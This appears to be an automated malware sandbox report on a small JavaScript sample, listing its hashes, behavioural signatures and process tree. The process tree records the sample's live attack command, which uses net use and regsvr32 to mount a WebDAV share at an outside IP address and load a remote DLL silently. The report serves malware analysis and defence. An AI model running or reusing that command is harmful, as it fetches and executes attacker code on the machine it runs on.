Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
22/07/2024, 13:51
Static task
static1
Behavioral task
behavioral1
Sample
102563788170921094.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
102563788170921094.js
Resource
win10v2004-20240709-en
General
-
Target
102563788170921094.js
-
Size
4KB
-
MD5
b525ddec0d4188aa1616850b1c203dc8
-
SHA1
f7c699fff9d83318bcc108eca3acb576f0bd1063
-
SHA256
9c92941e049803b311a82a1b0ff28780d396dca39682817e7e1af2d8ca65ac56
-
SHA512
ad35518b5ccbeb3a58e67b4f7fdda30e41a4e4db9b89611506f64615273173508392d2ba1e35c568575e4dee5d15facba34c90288ea7743b2f76b8f72a3f4f0a
-
SSDEEP
48:J2t9V2HLbQ+DPEMCL70lfQ1H5ZqTBl+OxDx+9QKoXAr3Dhhhb0e62FAkhE2T/y5s:kt728MCsFUDhdrFAkPTa+drFvT
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4480 wrote to memory of 3020 4480 wscript.exe 84 PID 4480 wrote to memory of 3020 4480 wscript.exe 84 PID 3020 wrote to memory of 696 3020 cmd.exe 86 PID 3020 wrote to memory of 696 3020 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\102563788170921094.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\883141611408.dll2⤵
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:696
-
-